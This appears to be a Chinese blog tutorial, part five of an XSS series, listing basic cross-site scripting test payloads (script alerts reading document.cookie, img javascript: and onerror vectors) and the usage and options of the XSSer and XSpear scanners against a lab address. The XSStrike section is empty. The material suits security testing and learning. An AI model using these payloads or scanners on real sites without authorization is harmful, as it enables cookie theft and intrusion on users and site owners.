XSS(五) xss检测与利用

XSS(五) xss检测与利用

1. 测试payload

<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src="javascript:alert('XSS')">
onerror="alert('XSS')">

2. XSSER

xsser -h

简单的注入攻击
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker”
选择“google”作为搜索引擎从Dork注入
xsser –De “google” -d “search.php?q=”
从URL执行多个注入,自动有效载荷,并建立反向连接。
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –auto –reverse-check -s
简单的URL注入,使用GET,Cookie注入并使用DOM shadow
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” -g “/path?vuln=” –Coo –Dom –Fp=”vulnerablescript”
启发式参数过滤
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –heuristic
启动GUI界面
xsser –gtk

option:-
-gtk 启动XSSer GTK界面

Select Target(s):
--all=TARGET        自动审计整个目标
-u URL, --url=URL   输入要审计的目标
-i READFILE         从文件中读取目标URL
-d DORK             使用查询搜索目标(例如:'news.php?id=')
-l                  从一组“dorks”中搜索
--De=DORK_ENGINE    使用此搜索引擎(默认:DuckDuckGo)
--Da                使用所有搜索引擎进行大规模搜索

Select type of HTTP/HTTPS Connection(s):
-g GETDATA          使用GET发送载荷(例如:'/menu.php?id=XSS')
-p POSTDATA         使用POST发送载荷(例如:'foo=1&bar=XSS')
-c CRAWLING         在目标上爬行的URL数:1-99999
--Cw=CRAWLER_WIDTH  爬虫的深度级别:1-5(默认:2)

Configure Request(s):
--cookie=COOKIE     更改您的HTTP Cookie头

3. XSpear

Xspear -u "" -v 1

[选项] 
-u, --url=target_URL [必填] 目标URL 
-d, --data=POST Body [可选] POST方法体数据 
-a, --test-all-params [可选] 测试所有参数(包括未反射的) 
--no-xss [可选] 不进行XSS测试,仅进行参数分析 
--headers=HEADERS [可选] 添加HTTP头 
--cookie=COOKIE [可选] 添加Cookie 
--custom-payload=FILENAME [可选] 加载自定义负载JSON文件 
--raw=FILENAME [可选] 加载原始文件(例如raw_sample.txt) 
--raw-ssl=BOOLEAN [可选] Burp原始文件的http/https切换,例如:true/false 
-p, --param=PARAM [可选] 测试参数 
-b, --BLIND=URL [可选] 添加Blind XSS向量 + 与XSS Hunter、ezXSS、HBXSS等一起使用... + 例如:-b https://hahwul.xss.ht 
-t, --threads=NUMBER [可选] 线程,默认值为10 
-o, --output=FORMAT [可选] 输出格式(cli,json,html) 
-c, --config=FILENAME [可选] 使用config.json 
-v, --verbose=0~3 [可选] 显示日志深度 + v=0:安静模式(仅显示结果) + v=1:显示扫描状态(默认) + v=2:显示扫描日志 + v=3:显示详细日志(请求/响应) 
-h, --help 打印此帮助信息 --version 显示XSpear版本 --update 显示如何更新

4. XSStrike

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值